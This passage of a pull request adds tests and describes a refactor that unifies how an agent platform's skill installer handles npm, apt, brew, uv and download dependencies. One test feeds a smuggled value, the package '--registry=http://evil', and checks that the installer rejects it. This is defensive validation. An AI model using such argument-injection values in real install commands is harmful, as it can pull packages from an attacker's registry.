+    monkeypatch.setattr(deps, "_run", fake_run)
+    results = await deps.install_deps([SkillInstallSpec(kind="node", id="c", package="cowsay")])
+
+    assert calls == [["npm", "install", "-g", "--ignore-scripts", "cowsay"]]
+    assert results[0].kind == "npm"
+
+
+async def test_install_deps_surfaces_a_failed_command(monkeypatch: pytest.MonkeyPatch) -> None:
+    async def fake_run(cmd: list[str], timeout: float = 120.0) -> tuple[int, str, str]:
+        return 1, "", "E404 Not Found - GET https://registry.npmjs.org/gmgn-cli"
+
+    monkeypatch.setattr(deps, "_run", fake_run)
+    results = await deps.install_deps([SPECS["npm"]])
+
+    assert not results[0].success
+    assert "E404" in results[0].message
+
+
+async def test_install_deps_rejects_an_unsafe_npm_package(monkeypatch: pytest.MonkeyPatch) -> None:
+    async def fake_run(cmd: list[str], timeout: float = 120.0) -> tuple[int, str, str]:
+        raise AssertionError("must not shell out for an invalid package")
+
+    monkeypatch.setattr(deps, "_run", fake_run)
+    results = await deps.install_deps(
+        [SkillInstallSpec(kind="npm", id="evil", package="--registry=http://evil")]
+    )
+
+    assert not results[0].success
+    assert "Unsafe install value" in results[0].message
+
+
+async def test_install_deps_explains_a_privileged_kind() -> None:
+    results = await deps.install_deps([SPECS["apt"]])
+
+    assert not results[0].success
+    assert "elevated privileges" in results[0].message
+    # The Skills page shows only this message, so it has to carry the command.
+    assert "sudo apt-get install -y gh" in results[0].message
+
+
+async def test_install_deps_reports_an_unknown_kind() -> None:
+    results = await deps.install_deps([SkillInstallSpec(kind="cargo", id="ripgrep")])
+
+    assert not results[0].success
+    assert "Unsupported install kind: cargo" in results[0].message


### PR DESCRIPTION
Fixes #358

## The problem

Three code paths each carried their own idea of what an `install.kind` was:

| path | knew |
|---|---|
| `skills/hub/deps.py` (Skills page) | `brew`, `uv`, `download` |
| `install_skill_deps` tool | `brew`, `node`, `go`, `uv` |
| `eligibility.py` hints | `brew`, `uv`, `npm`, `go`, `download` |

The seven bundled gmgn skills declare `kind: npm` — supported by neither executor — so their advertised deps flow answered `Unsupported install kind: npm` on both. The `github` skill's `kind: apt` spec failed the same way (a fourth kind none of the three tables listed).

## The fix

`src/agentos/skills/install_kinds.py` now owns both halves: the vocabulary and the command.

- **Vocabulary** — `brew`, `npm`, `go`, `uv`, `download`, `apt`, with `node` kept working as an alias for `npm` so third-party skills using the old spelling keep installing. Kinds narrow through `AUTO_INSTALL_KINDS` (what the Skills page runs unattended) and `ARGV_INSTALL_KINDS` (what reduces to a single argv).
- **Command** — `build_install_argv()` is what the executors run, and `render_install_command()` is `shlex.join` of the same thing. The command an operator is shown is now literally the command that runs.
- `apt` needs root and `download` needs a fetch plus a chmod that no single argv does, so both stay hint-only — and now say why, with the command spelled out in the message the Skills page surfaces, instead of reading as unsupported.

Also corrected along the way, since all three paths had to agree on one answer:

- A `uv` spec that declares `bins` installs with `uv tool install`; one that doesn't — a library like `openpyxl`, `python-pptx`, `pypdf` — keeps `uv pip install`. The agent tool ran `uv tool install` for both, which cannot work for a library.
- Only `brew` falls back to the spec `id` when `formula`/`package` is absent (its manifests have always named the spec after the formula). `npm`/`go`/`uv`/`apt` must say what they install — ids like `node-claude` or `libreoffice-darwin` are labels, and installing one from a public registry is a hazard.
- Pinned versions (`gmgn-cli@1.2.3`, `openpyxl>=3.1`) now pass the value allowlists instead of silently losing their install hint.
- An `apt` package can no longer end in `-`, which turns an `apt-get install -y` line into a *removal* of that package.
- The `download` hint validates its URL against the same regex the executor uses and quotes it, rather than interpolating it raw into a `curl … && chmod …` string an operator is invited to paste.

`sub-agent/SKILL.md` moves from `kind: node` to the canonical `npm` (the alias covers everyone else).

## Tests

`tests/test_skill_install_kinds.py` (37 tests), covering the issue's stated requirement and the paths themselves:

- every install kind declared by every bundled skill is supported by all three paths, and each path produces the *same* command for it
- the rendered hint equals `shlex.join` of the argv that would execute
- the `node` alias, `uv` tool-vs-library split, pinned versions, brew's id fallback and its absence elsewhere
- unsafe values — leading flags, shell metacharacters, apt's trailing `-` — never build a command on any path

## Verification

```
uv run ruff check src tests     # clean
uv run mypy src/agentos         # Success: no issues found in 613 source files
uv run pytest -q                # 8096 passed, 30 skipped
```

No frontend files touched. One note left for a follow-up: the Skills page still renders an Install button for `apt` specs; clicking it now returns the exact command to run instead of `Unsupported install kind`, but a manual-kind spec would be better rendered as a copyable command than as a button.

🤖 Generated with [Claude Code](https://claude.com/claude-code)